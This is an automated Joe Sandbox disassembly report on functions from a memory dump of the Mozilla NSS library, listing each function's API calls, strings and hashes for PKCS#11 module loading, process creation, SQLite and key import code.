String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 2698987ecf4b75a55a939c18ecc0e1c134cfafd557ae7d58728a32522ad49a99
Instruction ID: ef2ed439f4ac7da421d94d261b598dc3e4a64e46d5c4954c0e4d20d1c671586a
Opcode Fuzzy Hash: 2698987ecf4b75a55a939c18ecc0e1c134cfafd557ae7d58728a32522ad49a99
Instruction Fuzzy Hash: 8252F5B1E11305ABEF519F64CC057AA7BB4BF0A30CF254029ED09A7741EB71E958CB92

Function 6CEBBFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6CEBC0C8

Part of subcall function 6CF49440: LeaveCriticalSection.KERNEL32 ref: 6CF495CD
Part of subcall function 6CF49440: TlsGetValue.KERNEL32 ref: 6CF49622
Part of subcall function 6CF49440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6CF4964E

PR_EnterMonitor.NSS3 ref: 6CEBC0AE

Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF491AA
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49212
Part of subcall function 6CF49090: _PR_MD_WAIT_CV.NSS3 ref: 6CF4926B

Part of subcall function 6CE70600: GetLastError.KERNEL32(?,?,?,?,?,6CE705E2), ref: 6CE70642
Part of subcall function 6CE70600: TlsGetValue.KERNEL32(?,?,?,?,?,6CE705E2), ref: 6CE7065D
Part of subcall function 6CE70600: GetLastError.KERNEL32 ref: 6CE70678
Part of subcall function 6CE70600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6CE7068A
Part of subcall function 6CE70600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE70693
Part of subcall function 6CE70600: PR_SetErrorText.NSS3(00000000,?), ref: 6CE7069D
Part of subcall function 6CE70600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,EF8FC49E,?,?,?,?,?,6CE705E2), ref: 6CE706CA
Part of subcall function 6CE70600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6CE705E2), ref: 6CE706E6

PR_EnterMonitor.NSS3 ref: 6CEBC0F2
PR_ExitMonitor.NSS3 ref: 6CEBC10E
PR_ExitMonitor.NSS3 ref: 6CEBC081

Part of subcall function 6CF49440: TlsGetValue.KERNEL32 ref: 6CF4945B
Part of subcall function 6CF49440: TlsGetValue.KERNEL32 ref: 6CF49479
Part of subcall function 6CF49440: EnterCriticalSection.KERNEL32 ref: 6CF49495
Part of subcall function 6CF49440: TlsGetValue.KERNEL32 ref: 6CF494E4
Part of subcall function 6CF49440: TlsGetValue.KERNEL32 ref: 6CF49532
Part of subcall function 6CF49440: LeaveCriticalSection.KERNEL32 ref: 6CF4955D

PR_EnterMonitor.NSS3 ref: 6CEBC068

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

Part of subcall function 6CE70600: GetProcAddress.KERNEL32(?,?), ref: 6CE70623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6CEBC14F
PR_LoadLibraryWithFlags.NSS3 ref: 6CEBC183
free.MOZGLUE(00000000), ref: 6CEBC18E
PR_LoadLibrary.NSS3(?), ref: 6CEBC1A3
PR_EnterMonitor.NSS3 ref: 6CEBC1D4
PR_ExitMonitor.NSS3 ref: 6CEBC1F3
PR_CallOnce.NSS3(6CFE2318,6CEBCA70), ref: 6CEBC210
PR_EnterMonitor.NSS3 ref: 6CEBC22B
PR_ExitMonitor.NSS3 ref: 6CEBC247
PR_EnterMonitor.NSS3 ref: 6CEBC26A
PR_ExitMonitor.NSS3 ref: 6CEBC287
PR_UnloadLibrary.NSS3(?), ref: 6CEBC2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6CEBC392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CEBC3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6CEBC3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6CEBC782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6CEBC7B5
PR_UnloadLibrary.NSS3(?), ref: 6CEBC7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6CEBC82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CEBC8BF
PORT_Alloc_Util.NSS3(?), ref: 6CEBC8D5
free.MOZGLUE(00000000), ref: 6CEBC900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CEBC9C7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CEBC9E5
free.MOZGLUE(00000000), ref: 6CEBCA5A

Strings

NSC_ModuleDBFunc, xrefs: 6CEBC0FC
NSS_FORCE_TOKEN_LOCK, xrefs: 6CEBC77D
NSS_DISABLE_UNLOAD, xrefs: 6CEBC7B0
Vendor NSS FIPS Interface, xrefs: 6CEBC34A
FC_GetInterface, xrefs: 6CEBC054
NSC_GetInterface, xrefs: 6CEBC04F
PKCS 11, xrefs: 6CEBC2F9, 6CEBC314
nss_mod_log, xrefs: 6CEBC3CC
NSS_DEBUG_PKCS11_MODULE, xrefs: 6CEBC38D
NSS_ReturnModuleSpecData, xrefs: 6CEBC275
NSC_GetFunctionList, xrefs: 6CEBC093
FC_GetFunctionList, xrefs: 6CEBC098

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: 985ba2cd9789994c65a2bf53bb33442898e7952a72f3d6348cc84051e4472f4d
Instruction ID: 3057549cfef477b036291d7521b8aa4473c843ea0812a27c56f9c56d4b58772a
Opcode Fuzzy Hash: 985ba2cd9789994c65a2bf53bb33442898e7952a72f3d6348cc84051e4472f4d
Instruction Fuzzy Hash: 0142A3B1F14206AFEF84DF54CA47B6A3BB5BB4A308F244029D805ABB21E736D545CB91

Function 6CF93FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6CF93FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CF93FFE
malloc.MOZGLUE(-00000003), ref: 6CF94016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6CFCFC62), ref: 6CF9404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CF9407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CF940A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CF940D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF94112
malloc.MOZGLUE(00000000), ref: 6CF9411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6CF9414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF94160
free.MOZGLUE(?), ref: 6CF9416C
malloc.MOZGLUE(?), ref: 6CF941AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6CF941EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6CF94520), ref: 6CF94244
GetEnvironmentStrings.KERNEL32 ref: 6CF9424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF94263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF94283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF942B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF942E4
malloc.MOZGLUE(00000002), ref: 6CF942FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6CF94342
GetStdHandle.KERNEL32(000000F6), ref: 6CF943AB
GetStdHandle.KERNEL32(000000F5), ref: 6CF943B2
GetStdHandle.KERNEL32(000000F4), ref: 6CF943B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6CF94403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF94410

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6CF9445E
CloseHandle.KERNEL32(?), ref: 6CF9446B
free.MOZGLUE(?), ref: 6CF94482
free.MOZGLUE(00000000), ref: 6CF94492
free.MOZGLUE(00000000), ref: 6CF944A4
GetLastError.KERNEL32 ref: 6CF944B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6CF944BE
free.MOZGLUE(?), ref: 6CF944C7
free.MOZGLUE(00000000), ref: 6CF944D5
free.MOZGLUE(00000000), ref: 6CF944EA

Strings

=, xrefs: 6CF944F8
D, xrefs: 6CF94396
NSPR_INHERIT_FDS=, xrefs: 6CF941E9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 57874e34479e8b1115e157f86befe432132b48ebf760a9bb57fa333d673559d0
Instruction ID: 67fb365248b65a3536e60bbce07359254e56ee37062657355477cf1177ab1b2b
Opcode Fuzzy Hash: 57874e34479e8b1115e157f86befe432132b48ebf760a9bb57fa333d673559d0
Instruction Fuzzy Hash: 1602D271E043519BFF119F7988807AEBFB4BF26308F254169DC6AA7742D731A844CB92

Function 6CEA6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6CFAA8EC,0000006C), ref: 6CEA6DC6
memcpy.VCRUNTIME140(?,6CFAA958,0000006C), ref: 6CEA6DDB
memcpy.VCRUNTIME140(?,6CFAA9C4,00000078), ref: 6CEA6DF1
memcpy.VCRUNTIME140(?,6CFAAA3C,0000006C), ref: 6CEA6E06
memcpy.VCRUNTIME140(?,6CFAAAA8,00000060), ref: 6CEA6E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEA6E38

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6CEA6E76
TlsGetValue.KERNEL32 ref: 6CEA726F
EnterCriticalSection.KERNEL32(?), ref: 6CEA7283

Strings

!, xrefs: 6CEA7123

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: dfa49e978b340158991af57db83f9ad02cc22defb6f08936e91e5330a9386132
Instruction ID: 9aa9f78220553fd2a3220654d45b992748968eb59541045fc8b8d37955b601a2
Opcode Fuzzy Hash: dfa49e978b340158991af57db83f9ad02cc22defb6f08936e91e5330a9386132
Instruction Fuzzy Hash: 72729075D052149FDF60CF68CC8879ABBB5AF49308F2041E9D80CAB315DB31AA86CF91

Function 6CE13C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE13C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6CE13D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE13EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE13ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE13F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE14052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE1406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CE1410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE1449C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE14452, 6CE14486, 6CE144EA, 6CE14571, 6CE14580, 6CE1458F, 6CE1475A, 6CE147FA
database corruption, xrefs: 6CE14490, 6CE144F4, 6CE14599, 6CE14764, 6CE14804
%s at line %d of [%.10s], xrefs: 6CE14495, 6CE144F9, 6CE1459E, 6CE14769, 6CE14809

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: 0b90147fb0eaa17fe5f7d3732204fe075f0a3bfe519e3fddfb5d5379c982899d
Instruction ID: 0fda9099c9b53f122ba3fe93106b7abfa1b3515753015ad8e6dd82b264d5e589
Opcode Fuzzy Hash: 0b90147fb0eaa17fe5f7d3732204fe075f0a3bfe519e3fddfb5d5379c982899d
Instruction Fuzzy Hash: B9828B75A08205DFCB04CF69C480B9AB7B2BF4931CF3585AAD905ABB51E731EC52CB91

Function 6CEEAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CEEACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CEEACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CEEACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CEEAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CEEADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEEADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEEADF0

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEEB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEEB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CEEB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CEEB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6CEEB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEEB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEEB40C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 00a901e17fd56fc3d3d4c10ec215e5f6fd7a27c18c0c6fd2ee9cee0cf5e511c6
Instruction ID: 1ddf0b15372922a8fae30ef6a9ad3a69d4487f38f7a3ffce85d51e570af9e802
Opcode Fuzzy Hash: 00a901e17fd56fc3d3d4c10ec215e5f6fd7a27c18c0c6fd2ee9cee0cf5e511c6
Instruction Fuzzy Hash: CF228C71904301ABE710CF14CC45B9A77F1AF8834CF24856CE8595F7A2E772E859CB9A

Function 6CE31F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE325F3

Strings

no tables specified, xrefs: 6CE326BE
too many columns in result set, xrefs: 6CE33012
multiple recursive references: %s, xrefs: 6CE322E0
'%s' is not a function, xrefs: 6CE32FD2
recursive reference in a subquery: %s, xrefs: 6CE322E5
too many references to "%s": max 65535, xrefs: 6CE32FB6
table %s has %d values for %d columns, xrefs: 6CE3316C
access to view "%s" prohibited, xrefs: 6CE32F4A
H, xrefs: 6CE3322D
no such index: "%s", xrefs: 6CE3319D
%s.%s.%s, xrefs: 6CE3302D
no such table: %s, xrefs: 6CE326AC
a NATURAL join may not have an ON or USING clause, xrefs: 6CE332C1
unsafe use of virtual table "%s", xrefs: 6CE330D1
H, xrefs: 6CE3329F
%s.%s, xrefs: 6CE32D68
cannot have both ON and USING clauses in the same join, xrefs: 6CE332B5
cannot join using column %s - column not present in both tables, xrefs: 6CE332AB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: ad200f0feff206238c9240417f7b69a68e52b73dbfa979107e8c9fadd6afa439
Instruction ID: a1447f47b86500413941fd4c3b520a2f50babb4a150b8a9cdd3b947bb706a8b8
Opcode Fuzzy Hash: ad200f0feff206238c9240417f7b69a68e52b73dbfa979107e8c9fadd6afa439
Instruction Fuzzy Hash: 03D28E70E04229CFDB04CF99C484B9DB7B1BF59308F3891A9D899AB752D735B846CB90

Function 6CE6ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CE6ED38

Part of subcall function 6CE04F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE04FC4

sqlite3_mprintf.NSS3(snippet), ref: 6CE6EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6CE6EFE4

Part of subcall function 6CF2DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CE05001,?,00000003,00000000), ref: 6CF2DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6CE6F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6CE6F129
sqlite3_mprintf.NSS3(optimize), ref: 6CE6F1D1
sqlite3_free.NSS3(?), ref: 6CE6F368

Strings

unicode61, xrefs: 6CE6EDB5
optimize, xrefs: 6CE6F199, 6CE6F1CC, 6CE6F211
offsets, xrefs: 6CE6EFAF, 6CE6EFDF, 6CE6F01F
fts4, xrefs: 6CE6F2AD
simple, xrefs: 6CE6ED79
fts4aux, xrefs: 6CE6ECF9
matchinfo, xrefs: 6CE6F04F, 6CE6F082, 6CE6F0C2, 6CE6F0F2, 6CE6F124, 6CE6F169
porter, xrefs: 6CE6ED97
snippet, xrefs: 6CE6EF05, 6CE6EF37, 6CE6EF7C
fts3_tokenizer, xrefs: 6CE6EE1A, 6CE6EEA8
fts3, xrefs: 6CE6F247
fts3tokenize, xrefs: 6CE6F30F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 85287e0c3ab140693c57ecde0d81a60a689e9affe6f82a39d556a38080b91d51
Instruction ID: 2692bccc68e48be4bb604e24931cf1828b8c946e7348790fef3af6c82f24dc63
Opcode Fuzzy Hash: 85287e0c3ab140693c57ecde0d81a60a689e9affe6f82a39d556a38080b91d51
Instruction Fuzzy Hash: A90203B1BA43015BE7049F72988532B76B26BC530CF24893CD85A87F41EB78E856C792

Function 6CEE7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEE7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CEE7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6CEE7D1E

Part of subcall function 6CEE7870: SECOID_FindOID_Util.NSS3(?,?,?,6CEE91C5), ref: 6CEE788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEE7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CEE7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CEE7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEE7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEE7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CEE7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CEE7E58

Part of subcall function 6CEE7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CEE91C5), ref: 6CEE78BB
Part of subcall function 6CEE7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CEE91C5), ref: 6CEE78FA
Part of subcall function 6CEE7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CEE91C5), ref: 6CEE7930
Part of subcall function 6CEE7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CEE91C5), ref: 6CEE7951
Part of subcall function 6CEE7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CEE7964
Part of subcall function 6CEE7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CEE797A
Part of subcall function 6CEE7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CEE7988
Part of subcall function 6CEE7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CEE7998
Part of subcall function 6CEE7870: free.MOZGLUE(00000000), ref: 6CEE79A7
Part of subcall function 6CEE7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CEE91C5), ref: 6CEE79BB
Part of subcall function 6CEE7870: PR_GetCurrentThread.NSS3(?,?,?,?,6CEE91C5), ref: 6CEE79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEE7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEE7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CEE7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEE7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CEE7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CEE8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CEE8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CEE8093
SECOID_FindOID_Util.NSS3 ref: 6CEE7F29

Part of subcall function 6CEE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE88298,?,?,?,6CE7FCE5,?), ref: 6CEE07BF
